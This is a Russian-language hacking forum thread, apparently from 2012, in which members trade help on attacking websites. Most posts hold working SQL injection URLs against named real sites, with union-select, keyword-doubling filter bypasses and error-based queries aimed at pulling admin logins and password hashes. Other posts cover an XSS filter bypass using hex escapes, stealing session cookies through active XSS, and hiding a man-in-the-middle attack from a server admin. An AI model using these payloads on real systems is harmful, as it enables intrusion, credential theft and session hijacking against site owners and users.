Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    cat1vo угловые скобки то выр6жутся
     
  2. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Если ты ее используешь, сожги код и перепиши с использованием htmltospecialchars
     
  3. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    нет не мой, просто знаю код фильтра на сайте, над xss
     
  4. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+order+by+1--+
    в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа
     
  5. lucky_dom

    lucky_dom New Member

    Joined:
    2 Jun 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    как незаметно для админа сервера тунелировать весь траф. Через прокси или тому подобное.
    1.задача проведения атаки человек посередине.
    2.как узнать пароль от веб сервера (apach виндовый) локально.
     
    #20645 lucky_dom, 24 Jun 2012
    Last edited: 24 Jun 2012
  6. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    Да, у меня тоже( С помощью хавиж достал, но только логины
    А тут как:
    http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3
    http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=15

    А по поводу http://super.com.co, попробуйте, может у кого откроется, нужны хеши :(
     
    #20646 A_n_d_r_e_i, 24 Jun 2012
    Last edited: 24 Jun 2012
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    565
    Likes Received:
    375
    Reputations:
    267
    Прикольно =)

    Code:
    http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11#
    При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uniunionon, selselectect так же false. Поэтому:
    Code:
    http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+and+'1'='1
    =)
    А что помешало достать пароли?
    Com_wrapper, даже смотреть не буду :)
     
  8. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    Возникла следующая ситуация:

    Есть не рут доступ, но httpd.conf доступен на запись.
    Как принудительно ребутнуть апач (или перепрочитать конфиги) , если на "service httpd graceful" не хватает прав? может кто сталкивался... грубо говоря нужно заставить его самого перезагрузиться из вне.
     
  9. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    Code:
    Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/xxx.ru/www/lib/core.php on line 18
    а возможно как то раскрутить или это просто вывод инфы?
     
  10. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    ну вот допустим http://www.justsims2.ru/
    PHPSESSID доставляю ^ и вывод ошибки
     
  11. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    566
    Likes Received:
    289
    Reputations:
    42
    session_start выплевывает ворнинг в случае, если передан некорректный идентификатор сессии(довольно часто встречающиеся раскрытие)
    https://rdot.org/forum/showpost.php?p=23631&postcount=1855
    лечится простой заглушкой @session_start();
     
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Зависит от того, где будет вывод кода на странице.
    В этом примере твоя фильтрация не поможет:
    PHP:
    ...
    <script>
    ...
    document.write('<img src="http://site.com/images/avatar/<?php echo(anti_xss($_GET['user_id'])) ?>.gif" />');
    ...
    </script>
    ...
    Вектор атаки мог выглядеть так:
    http://site.com/show.php?user_id="onerror="alert('XSS');//
    Результат:
    PHP:
    <img src="http://site.com/images/avatar/"onerror="alert('XSS');//.gif" />'
    Из-за фильтра это сделать не получится. Но так как вывод в данном случае внутри строки JS, мы можем использовать escape-последовательности \x или \u для обхода фильтра:
    http://site.com/show.php?user_id=\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x2F\x2F

    P.S.: Это не просто просто пример, придуманный мной. Подобный код встречается в крупнейших почтовых сервисах и соц.сетях.
     
    #20652 M_script, 26 Jun 2012
    Last edited: 26 Jun 2012
    5 people like this.
  13. Dad69

    Dad69 New Member

    Joined:
    16 Oct 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь объясните же мне, наконец!
    Раньше спокойно юзал активную xss, куки приходили в полном объёме.Вот к примеру:
    HTML:
    SESSd9cc53338c9b7991787e099f00cbe150=hpl0badg2frcecella6toj9kn1; authcache=886e35; drupal_user=*****; drupal_uid=961; __utma=50912437.1205324149.1316182441.1330256374.1330260320.747; __utmb=50912437.500.10.1330260320; __utmc=50912437; __utmz=50912437.1330260320.747.249.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not provided); hotlog=1; DRUPAL_UID=961; has_js=1
    Теперь приходят какие то объедки
    HTML:
    __utma=50912437.727943270.1327681550.1339957378.1339957644.261; __utmb=50912437.7.10.1339957644; __utmc=50912437; __utmz=50912437.1339957644.261.5.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=******* регистрация; __cfduid=d00e1872cac587b88ebc65d3c4eba687d1338303786; b=b; hotlog=1; b=b
    Где SESSID?Где drupal_user?Без них подменная не возможна.
    Если ввести
    HTML:
    <script>javascript:alert(document.cookie)</script>
    то мы получим такую же лабуду без SESSID и т.д.Ладно, попробуем просмотреть куки через браузер(в данном случае Mozilla) Инстурменты->Информация о странице-> Просмотреть куки и-о чудо!Всё на месте, SESSID и т.д.
    Так как же быть?Если даже через обычный скрипт
    HTML:
    <script>javascript:alert(document.cookie)</script>
    нельзя полностью просмотреть куки :confused:
    Да, возможно у меня квадратный мозг, а эту проблему может решить полный нуб.И всё же, объясните мне, идиоту, как полностью своровать куки :(
     
  14. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    у нужных тебе куков установлен флаг HttpOnly . Проблему решит метод TRACE, но на практике почти не юзается.
     
    _________________________
  15. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ребят, http://tools.phxglobal.com/articles.php?id=-39%20or%201=1 работает но не кидает ошибок - подскажите как решить...
     
  16. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    42
    Reputations:
    26
    http://tools.phxglobal.com/articles.php?id=-39+union+select+1,version(),user(),4,5,6+--+
     
  17. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='
     
  18. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    http://m-kat.ru/info.php?search=1'uniololon+seololect+1,2http://bit.ly/MAt6Af,3,4,5и тут ещё что-нибудь напишу,6--+
     
    1 person likes this.
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    565
    Likes Received:
    375
    Reputations:
    267
    Code:
    http://m-kat.ru/info.php?search='and(select+1+from(select+count(*),concat(([COLOR=Red]select+table_name+from+information_schema.tables+limit+0,1[/COLOR]),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
     
    1 person likes this.
  20. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Подставил правильное имя таблицы - запрос матерится - не пойму на что... http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=aadm_users+LIMIT+0,1+--+
     
Loading...
Thread Status:
Not open for further replies.